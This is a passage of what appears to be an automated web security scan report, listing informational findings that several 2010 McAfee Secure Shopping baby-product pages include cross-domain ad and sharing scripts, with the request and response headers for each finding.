Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:11 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:52:11 GMT
Content-Length: 66714

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Mattress Pads at McAfee Secure Shopping - Search, Discover &
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.38. http://secureshopping.mcafee.com/browse/baby/bedding/sheets/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/bedding/sheets/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/bedding/sheets/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:12 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:52:12 GMT
Content-Length: 60171

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Sheets at McAfee Secure Shopping - Search, Discover & Compar
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.39. http://secureshopping.mcafee.com/browse/baby/bedding/washcloths/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/bedding/washcloths/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/bedding/washcloths/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:12 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:52:12 GMT
Content-Length: 62337

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Washcloths at McAfee Secure Shopping - Search, Discover & Co
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.40. http://secureshopping.mcafee.com/browse/baby/diapering/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/diapering/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/diapering/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:07 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:51:07 GMT
Content-Length: 68555

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Diapering at McAfee Secure Shopping - Search, Discover & Com
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.41. http://secureshopping.mcafee.com/browse/baby/diapering/baby-wipes/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/diapering/baby-wipes/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/diapering/baby-wipes/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:08 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:51:08 GMT
Content-Length: 62558

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Baby Wipes at McAfee Secure Shopping - Search, Discover & Co
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.42. http://secureshopping.mcafee.com/browse/baby/diapering/diaper-bags/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/diapering/diaper-bags/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/diapering/diaper-bags/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:12 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:51:12 GMT
Content-Length: 55676

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Diaper Bags at McAfee Secure Shopping - Search, Discover & C
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.43. http://secureshopping.mcafee.com/browse/baby/diapering/diaper-covers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/diapering/diaper-covers/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/diapering/diaper-covers/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:13 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:51:13 GMT
Content-Length: 64848

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Diaper Covers at McAfee Secure Shopping - Search, Discover &
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.44. http://secureshopping.mcafee.com/browse/baby/diapering/diaper-storage-disposal/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/diapering/diaper-storage-disposal/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/diapering/diaper-storage-disposal/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:17 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:51:17 GMT
Content-Length: 64780

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Diaper Storage & Disposal at McAfee Secure Shopping - Search
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.45. http://secureshopping.mcafee.com/browse/baby/diapering/diapers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/diapering/diapers/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/diapering/diapers/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:17 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:51:17 GMT
Content-Length: 62535

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>View Diapers at McAfee Secure Shopping - Search, Discover & Compa
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.46. http://secureshopping.mcafee.com/browse/baby/diapering/skin-care/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/diapering/skin-care/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /browse/baby/diapering/skin-care/ HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:51:20 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:51:20 GMT
Content-Length: 55030

